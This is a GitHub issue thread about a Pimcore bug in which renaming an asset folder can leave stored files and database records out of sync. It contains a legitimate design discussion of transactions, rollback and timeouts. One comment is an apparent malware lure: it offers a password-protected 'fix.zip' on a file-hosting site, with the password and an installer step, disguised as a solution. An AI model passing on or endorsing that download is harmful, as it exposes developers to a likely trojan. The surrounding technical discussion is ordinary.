### ISSUE TITLE
[Bug]: Assets can be Lost on Folder Rename

### ISSUE THREAD

**Issue by cancan101** [pimcore/pimcore#17534]
### Pimcore version

11.3.1

### Steps to reproduce

Rename an asset folder that folder that contains assets and / or other folders. Trigger some sort of issue with renaming one of the files.

### Actual Behavior

Pimcore records the asset as renamed but the file is not actually moved in the storage system.

this is a really problem when there are many files and the failure happens in the middle of the list

See: https://github.com/pimcore/pimcore/blob/30a54ab0679c0f380b3a2a05889bfe252e0c51d3/models/Asset.php#L1661-L1681

### Expected Behavior

any files that are moved are not recorded as moved.

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fashxp** [comment]
would need to lock the update-childpaths process, right?

**Comment by cancan101** [comment]
>would need to lock the update-childpaths process, right?

What do you mean by that?

The process would be something like (all of this recursively, I think):
1. Clone the asset folder being renamed to the new name
2. (Ideally using DB transactions matching the FS calls) begin transaction
3. Move asset to new parent
4. Issue file store rename
5. Commit transaction / role back if store fails
6. Delete the original named asset folder (which at this point should have no children)

TL; DR, you don't want to get into a state where the file store gets out of sync with the database. Right now this can happen quite badly.

**Comment by kingjia90** [comment]
https://github.com/pimcore/pimcore/blob/30a54ab0679c0f380b3a2a05889bfe252e0c51d3/models/Asset.php#L1679 looks not ideal, it should be allowing throwing something to rollback the transaction on line `550`
https://github.com/pimcore/pimcore/blob/b519b7abca844533add8eac576e442d3e857eb43/models/Asset.php#L529-L552

**Comment by cancan101** [comment]
>looks not ideal, it should be throwing something to rollback the transaction on line 550

You want to be careful the transaction doesn't wrap the _entire_ for loop of file moves. The issue is that the moves to the underlying file store are _each_ atomic such that any one of them could on its own fail. You would then want to roll back just the DB change for that one file asset / file.

**Comment by kingjia90** [comment]
mhh, true, maybe something like https://github.com/pimcore/pimcore/pull/17540 might work
So in short the db change and the actual file move are more closely tied

**Comment by cancan101** [comment]
I am thinking something along the lines of depth first decent into the folder tree where at each folder level:
1. Clone the folder
2. for each asset in the folder:
3. if it is a non folder, move it. commit on successful move. theoretically okay to continue on failure, but the (sub) transaction should be rolled back 
4. if it is a folder, recurse on (1)
5. Delete the original folder which should now be empty.
6. by [end to end principle](https://en.wikipedia.org/wiki/End-to-end_principle) the user will see any failed to move assets though an error / warning would be good too.

Since you are using a transaction on outer save and nested transactions aren't [real in mysql](https://stackoverflow.com/questions/1306869/are-nested-transactions-allowed-in-mysql) and assuming don't want to use savepoints (n.b. `SAVEPOINTS` might be interesting to explore), then would have to do the move outside of that final transaction.

**Comment by kingjia90** [comment]
Savepoint seem easily managed by starting a new transaction 

https://www.doctrine-project.org/projects/doctrine-dbal/en/4.1/reference/transactions.html#transaction-nesting

For clone, do you mean to copy the folder for a sort of dry run? It sounds it might get costly and slow for remote cloud storages.

**Comment by cancan101** [comment]
For clone, I just meant to copy the database entry on the pimcore side. That way there's a record to track the moved file binary but also to track it before it's moved.

so if you you are renaming a folder `folderA`, which contains `fileC` to `folderB`, you would clone the `folderA` Asset entry in Pimcore to `folderB` then update the DB for `fileC`'s parent (not committed) then move on the file system. If that works you would commit. When done you would delete `folderA`. If the the move of C fails you would keep around `folderA` so that C still has a parent.

**Comment by brusch** [comment]
@kingjia90 just created https://github.com/pimcore/pimcore/pull/17850 - I think we should rollback everything if one file move fails, just to be consistent - otherwise it could be very confusing when certain files are getting moved and others one not. 

WDYT?

**Comment by kingjia90** [comment]
@brusch Thank you for having a look and for the PR , looks good and safer to me, it's exactly like the more "all or nothing" approach that also popped up in my mind [at first](https://github.com/pimcore/pimcore/issues/17534#issuecomment-2312620754), but then this other comment kind of struck me https://github.com/pimcore/pimcore/issues/17534#issuecomment-2312627902.

I felt it could turn into something time/resources/costs expensive (eg.cloud storage) to move folder (and kind of "frustrating". thinking of huge amount of subfolder,subitems), as it may be interrupted by a single "child" asset (that for whatever reason throws an errors) and needs to revert everything back from the parent, sounded a little too much for a such deterministic operation that should go smoothly. 

That's why i have tried a different approach where you could "ignore" or intervene afterwards on the single failing stuff, but started to turning into something complicated, so i am also in favor of keeping it simpler.

**Comment by brusch** [comment]
@kingjia90 yeah, I was thinking about non-techies, how should you explain that e.g. only 98% of moving the files actually worked and that you now have to merge the 2 parts somehow manually, then it's better to rollback everything, then you know what the current status is ... 

That's imho not practicable and therefore we shouldn't do that.

**Comment by kingjia90** [comment]
But we have to consider that until now and before that PR, it was already silently ignoring/skipping the problematic files and keep going on, there would be a  behavior change from user point of view.

**Comment by cancan101** [comment]
The MVP solution is that Pimcore and the blob / file store to not become out of sync. i.e. losing track of files is very bad.
I am fine with either of:
1. Rollback all the file that had moves when there is issue (and ideally list the problematic file to the user so they can fix)
2. Leave the files moved as is and just update the Pimcore records to reflect what actually moved (i.e. if there is an error in moving, the tree will be left with two folders: the folder of files that did move and the folder of files that have not yet moved)

Both of them have pros and cons from a UX standpoint. (1) will have file move costs and the rollback might itself fail and / or take a very long time. Personally I would be fine with (2) as long as a message is displayed to the user indicating that the "move couldn't be completed" with ideally a message as to what file name caused the issue.

**Comment by brusch** [comment]
@kingjia90 I would be also fine with the second option, so not rolling back, but keeping the failed files in their old location, as long as we report this behavior and the failed files to the user -> so the user-experience must be ensured. 

But I think #17850 would be a first and probably easier solution, right? Because that's what a user probably expects, the second option would need more explanation. 

Regarding behavior change ... I'd classify this definitely as a bug, fixing it, does change the behavior, BUT I don't think someone actually does rely on the current unpredictable behavior.

**Comment by kingjia90** [comment]
Mhhh,  for me that "all or nothing" approach is also fine.
Unfortunately we don't have an exact data of how often this could happen that there are files that cannot be moved. 
I hope it's an extremely rare case and consequence of misusing/bad practice.




Leaving some other thoughts, by looking from another perspective, the end user would be required to open a ticket to their devs in any case:

A) currently, on error, the db and physical file may not match. The problem is that nobody would know which ones until they try to open it
  - Could be helped by some scanner/health check? 
  - Shouldn't we log the exact details?

B) After #17850, if they need to rename and cannot, they are completely stuck until a dev intervenes. 
  - It can be bypassed by manually (create destination path as folder) moving every single (children) asset and skip the exact ones that do throw error. Might be viable for small folders. Would end up in the option 2 situation but done manually.

C) Option 2 or a popup reporting which files are not being moved also need the devs to intervene on the source folder, it would be useful to report in the ticket (screenshot) it but could be also completely ignored&unreported and need some kind of scanner proposed in A

TLDR: Should the devs be monitoring it OR enduser forced to actively open a ticket OR hoping the enduser will be proactive in reporting the issues?

**Comment by cancan101** [comment]
I also just noticed that Pimcore moves all the files in the folder, _not just the Assets that are tracked by Pimcore_.
https://github.com/pimcore/pimcore/blob/30a54ab0679c0f380b3a2a05889bfe252e0c51d3/models/Asset.php#L1668-L1670

In other words, if there is junk in the folder (potentially with names that Pimcore / flyststem cannot handle, Pimcore still tries to move them potentially resulting in an fixable error.

**Comment by cancan101** [comment]
One more issue I will raise is how to handle timeouts? for example if there are no _file_ issues but what happens if the request times out (from `max_execution_time`)? Will php then kill the file rename mid process?

**Comment by brusch** [comment]
@cancan101 

> I also just noticed that Pimcore moves all the files in the folder, _not just the Assets that are tracked by Pimcore_.  

Yes, but those folders should be exclusively managed by Pimcore, so we can assume no junk or other stuff there - I'd keep it as it is to be honest - keeps things simpler. 



> One more issue I will raise is how to handle timeouts? for example if there are no _file_ issues but what happens if the request times out (from `max_execution_time`)? Will php then kill the file rename mid process?  

That's a topic yes 🤔

**Comment by brusch** [comment]
@kingjia90 

> I hope it's an extremely rare case and consequence of misusing/bad practice.

Yes, I agree, it shouldn't be the normal case. 

Since this should be an edge-case anyway I'd proceed as follows: 
- we rollback the entire transaction, by moving all the files back to the original location
- we do ignore temp files in case of an rollback 
- we throw a nested exception with a meaningful message, so that the info gets properly logged and can be displayed in the UI 
- we accept the fact that in this case a dev needs to be involved, because something is misbehaving and needs to be fixed

**Comment by cancan101** [comment]
>One more issue I will raise is how to handle timeouts? 

Won't PHP kill the rollback logic as well, in the case the timeout it triggered? That will still leaving the filesystem and DB in inconsistent states.

>Since this should be an edge-case anyway I'd proceed as follows:

The problematic file issue might be an edge case, but the timeout actually happens a lot if the directory contains many files. I was testing file moves last night and many of our directories took longer than 30 seconds (our current timeout) to complete the move. I would prefer to avoid bumping that time to a lot longer.

**Comment by kingjia90** [comment]
Closing this as resolved in https://github.com/pimcore/pimcore/pull/17850

For "paperwork"/planning purposes, could you please open a new issue for the timeout? TIA

**Comment by cancan101** [comment]
@brusch Looking #17850 A few issue I am seeing:
1. [If the the relocating of the thumbnails errors, the transaction gets rolled back but the main files have still been moved](https://github.com/pimcore/pimcore/blob/6c507959db15a9fc26f7a746cd286dbf0f7dc4ec/models/Asset.php#L537). I am not sure we want to fail if thumbnails can't be moved
1. In general we should rollback all moves (main files being most important) if we hit exception handler
1. If the commit fails, we should roll back the move. 

1 and 2 are most important now. LMK if you want me to open a new ticket

**Comment by brusch** [comment]
@cancan101 yes, plz create follow-up tickets - thanks! 😊

**Comment by cancan101** [comment]
@brusch: https://github.com/pimcore/pimcore/issues/18238
